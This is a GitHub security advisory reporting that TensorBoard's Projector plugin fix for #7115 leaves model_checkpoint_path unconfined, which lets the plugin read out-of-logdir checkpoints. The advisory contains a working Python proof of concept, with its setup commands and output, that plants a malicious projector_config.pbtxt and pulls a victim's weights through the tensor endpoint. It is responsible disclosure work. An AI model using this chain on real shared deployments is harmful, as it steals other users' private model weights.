Skip to content

[Security] Incomplete fix of #7115: projector model_checkpoint_path is not confined to the logdir, allowing read and exfiltration of arbitrary TensorFlow checkpoints outside the logdir #7119

@geo-chen

Description

@geo-chen

Reporting here as advised in https://issuetracker.google.com/issues/522459885

Package: tensorboard (PyPI), TensorBoard Projector plugin
Affected Versions: current main at commit deb522a (the #7115 fix), and all prior versions
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)

Summary

Commit deb522a ("Fix Projector Plugin vulnerability (#7115)") hardened the Projector plugin so that the user controlled asset paths in projector_config.pbtxt (metadata_path, tensor_path, bookmarks_path, and sprite.image_path) are resolved against, and confined to, the directory that contains projector_config.pbtxt. The fix did not cover a fifth user controlled path in the same config file: model_checkpoint_path. That field is still passed straight to tf.train.load_checkpoint() with no confinement check. An attacker who can write or influence a projector_config.pbtxt under a scanned logdir (the exact threat model the #7115 fix addresses) can point model_checkpoint_path at any TensorFlow checkpoint elsewhere on the host. TensorBoard then enumerates that checkpoint's variables, advertises them in the served config, and returns their raw tensor bytes through the /data/plugin/projector/tensor route. This discloses the contents of other users' or other tenants' private model checkpoints (the model weights), which on a shared training host or multi tenant TensorBoard deployment is the most sensitive asset present.

Details

The fix added _rel_to_abs_asset_path() (tensorboard/plugins/projector/projector_plugin.py:212), which resolves a candidate path and rejects it when it escapes the config directory:

def _rel_to_abs_asset_path(fpath, config_fpath):
    config_dir = os.path.realpath(os.path.dirname(os.path.expanduser(config_fpath)))
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    error_message = 'Asset path "%s" resolves outside the config directory' % (fpath)
    try:
        common_path = os.path.commonpath([config_dir, candidate])
    except ValueError as e:
        raise ValueError(error_message) from e
    if common_path != config_dir:
        raise ValueError(error_message)
    return candidate

The four patched fields route through this function: tensor_path (line 380 and 680), metadata_path (line 620), bookmarks_path (line 752), and sprite.image_path (line 801). Pointing any of those at a path outside the logdir now returns a clean 400.

model_checkpoint_path does not. It is read from the attacker controlled config in _read_latest_config_files() (text_format.Parse(file_content, config), line 457), checked only for existence with a glob, and then handed directly to the checkpoint reader in _get_reader_for_run():

# tensorboard/plugins/projector/projector_plugin.py
478    if (
479        config.model_checkpoint_path
480        and _using_tf()
481        and not tf.io.gfile.glob(config.model_checkpoint_path + "*")   # existence only
482    ):
...
498    if config.model_checkpoint_path and _using_tf():
499        try:
500            reader = tf.train.load_checkpoint(config.model_checkpoint_path)  # no confinement

There is no call to _rel_to_abs_asset_path(config.model_checkpoint_path, ...) anywhere, so the path is never confined to the config directory.

The readback is automatic and does not require the attacker to know any variable names. In _augment_configs_with_checkpoint_info() the reader enumerates every 2D variable in the target checkpoint and adds it to the served config:

415    var_map = reader.get_variable_to_shape_map()
416    for tensor_name, tensor_shape in var_map.items():
417        if len(tensor_shape) != 2:
418            continue
...
425        embedding = config.embeddings.add()
426        embedding.tensor_name = tensor_name

That augmented config is returned by /data/plugin/projector/config. The client then requests each tensor, and _serve_tensor() returns the raw bytes:

699    reader = self._get_reader_for_run(run)
...
709    tensor = reader.get_tensor(name)
...
719    data_bytes = tensor.tobytes()
720    return Respond(request, data_bytes, "application/octet-stream")

So the full chain is: attacker plants projector_config.pbtxt with model_checkpoint_path pointing outside the logdir, the config endpoint discloses the variable names and shapes of that out of logdir checkpoint, and the tensor endpoint returns the raw weights. This is the same class of issue, in the same file and same config message, that #7115 set out to close for the other path fields.

The read is constrained to valid TensorFlow checkpoint files (a non checkpoint path such as /etc/passwd fails load_checkpoint() and is caught), so this is not arbitrary file read of any file. In TensorBoard's own domain that constraint still exposes the highest value data on the host: trained model weights from other users' runs.

PoC

This reproduces against the real plugin code at commit deb522a. It writes a "victim" checkpoint outside the logdir, plants a malicious projector_config.pbtxt that points at it, and shows the weights coming back out of the tensor endpoint.

python3 -m venv tbvenv
./tbvenv/bin/pip install tensorflow-cpu werkzeug pillow grpcio-tools
# generate the plugin's protobuf modules in the checkout (run from the repo root):
./tbvenv/bin/python -m grpc_tools.protoc -I. --python_out=. $(find tensorboard -name '*.proto')
./tbvenv/bin/python poc_model_checkpoint_path.py

poc_model_checkpoint_path.py:

import os, sys, json, tempfile
import numpy as np
sys.path.insert(0, ".")  # use this checkout
import tensorflow as tf
from werkzeug.test import Client
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins import base_plugin

work = tempfile.mkdtemp(prefix="tb_poc_")

# Victim's PRIVATE checkpoint, OUTSIDE the shared logdir.
secret_dir = os.path.join(work, "victim_private", "secret_model")
os.makedirs(secret_dir)
SECRET = np.array([[1337.0, 7331.0, 4242.0],
                   [9001.0, 1234.0, 5678.0]], dtype=np.float32)
ckpt = tf.train.Checkpoint(stolen_weights=tf.Variable(SECRET, name="stolen_weights"))
prefix = ckpt.write(os.path.join(secret_dir, "model.ckpt"))

# Attacker controlled shared logdir: a malicious config that points outside it.
logdir = os.path.join(work, "shared_logdir")
os.makedirs(logdir)
with open(os.path.join(logdir, "projector_config.pbtxt"), "w") as f:
    f.write('model_checkpoint_path: "%s"\n' % prefix)
assert not os.path.realpath(prefix).startswith(os.path.realpath(logdir))

plugin = projector_plugin.ProjectorPlugin(
    base_plugin.TBContext(logdir=logdir, data_provider=None))

def get(handler, query):
    return Client(handler).get("/?" + query)

cfg = get(plugin._serve_config, "run=.").get_data(as_text=True)
name = json.loads(cfg)["embeddings"][0]["tensorName"]   # auto-discovered, no prior knowledge
data = get(plugin._serve_tensor, "run=.&name=%s" % name).get_data()
print("exfiltrated:", np.frombuffer(data, dtype=np.float32).tolist())
print("victim secret:", SECRET.flatten().tolist())

Observed output:

exfiltrated: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
victim secret: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]

For contrast, calling the patched helper with the same out of logdir path is rejected:

_rel_to_abs_asset_path("/.../victim_private/secret_model/model.ckpt", "/.../shared_logdir/projector_config.pbtxt")
-> ValueError: Asset path "..." resolves outside the config directory

confirming the other four fields are confined while model_checkpoint_path is not.

Impact

Information disclosure (CWE-22). An attacker who can write or influence a projector_config.pbtxt under a logdir that TensorBoard scans, which is the threat model the #7115 fix explicitly targets ("deployments where an attacker can write or influence projector_config.pbtxt contents under a scanned logdir"), can cause TensorBoard to read any TensorFlow checkpoint on the host that the TensorBoard process can access, and return its variable names, shapes, and raw weight tensors over HTTP. On a shared training host or a multi tenant TensorBoard instance this exposes other users' private model weights. No TensorBoard credentials are required, and the attacker does not need to know any variable names in advance because the config endpoint enumerates them. The impact is confidentiality only; the target must be a valid TensorFlow checkpoint, so it is not arbitrary read of any file type. This is an incomplete fix of #7115 and should be closed the same way the four sibling fields were: by confining model_checkpoint_path to the config directory.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions